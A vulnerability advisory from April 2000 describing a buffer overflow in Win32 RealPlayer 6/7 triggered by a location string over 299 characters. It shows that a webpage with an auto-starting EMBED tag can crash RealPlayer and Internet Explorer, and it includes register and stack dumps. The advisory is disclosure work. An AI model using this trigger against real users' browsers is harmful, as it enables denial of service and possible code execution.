Win32 Realplayer 6/7 Buffer Overflow Vulnerability Summary: ---------------------- There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6 and 7. This appears to occur when >299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. I have tested the MacOS and Linux Realplayer clients and have as yet not found such a vulnerability. Using the HTML "EMBED" tag to embed RealPlayer in a webpage and setting the "AUTOSTART=true" flag, you can force RealPlayer to start automatically, triggering the overflow condition. While I have not taken the time to find the proper entrance point in PNEN3260.DLL (which is what crashes, for example, in RealPlay 6 Basic), it appears that arbitrary code could be exploited simply by *VISITING* a webpage with the malicious embedded RealPlayer tags. (the following example is using RealPlayer v.6 Basic) In full effect, yo: ------------------- For example: RealPlayer Win32 Version 6.0.7.380 Type into "Location" http://aaaaaaaaaaa..... (300 a's) "This program has performed an illegal operation and will be shut down." REALPLAY caused an invalid page fault in module PNEN3260.DLL at 015f:6216d7ca. Registers: EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202 EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88 ECX=007c0350 DS=0167 ESI=007c0350 FS=629f EDX=00000001 ES=0167 EDI=007c0350 GS=0000 Bytes at CS:EIP: ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d Stack dump: 007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c 6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100 007c0100 00c6fed4 Fun. It looks like RealPlayer can be made to execute arbitrary code. It gets worse, using the HTML EMBED tag for RealPlayer you can force a web browser (MSIE in this case) to crash as well. This is left as an exercise for the reader.... Once you embed the RealPlayer in an html page, when Real crashes, it takes Internet Explorer with it... "This program has performed an illegal operation and will be shut down" IEXPLORE caused an invalid page fault in module KERNEL32.DLL at 015f:bff7a379. Registers: EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216 EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864 ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7 EDX=084d0000 ES=0167 EDI=01615dac GS=0000 Bytes at CS:EIP: 89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50 Stack dump: 01615dac 00000000 084d000c 084d0000 084e5054 00000000 00000000 00009afb 000084e6 0058d88c bff7a541 084d0000 084e5054 000003b4 00000000 00000001 and the extra bonus of: "This program has performed an illegal operation and will be shut down" IEXPLORE caused an invalid page fault in module PNEN3260.DLL at 015f:621874ba. Registers: EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202 EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4 ECX=08616860 DS=0167 ESI=086163e0 FS=3937 EDX=61616161 ES=0167 EDI=8004004e GS=0000 Bytes at CS:EIP: ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90 Stack dump: 08616b90 085e69f0 067dfeec 6218893b 085034ec 00400050 00400000 00400000 067dff04 621838b4 08616b90 04606568 0000023c 086163e0 067dff38 62183a47 load the malicious page enough times and you get a fun dialog box that just won't go away... unless you reboot. "This program has performed an illegal operation and will be shut down" IEXPLORE caused an invalid page fault in module KERNEL32.DLL at 015f:bff87eb5. Registers: EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206 EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000 Bytes at CS:EIP: 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75 Stack dump: etc etc etc. Resolution: ----------- Vendor Notified 3 April 2000, 10:00 AM MST via email. Vendor patch should be forthcoming... ---------------------------------------------------- - Adam Muntner \ Save the Whales! - - adam@alienzoo.com \ Collect Valuable - - Systems Engineer \ Prizes! - - http://www.alienzoo.com \ - ---------------------------------------------------- ----------------------------------------------------- Get free email and alien enlightenment from http://www.alienzoo.com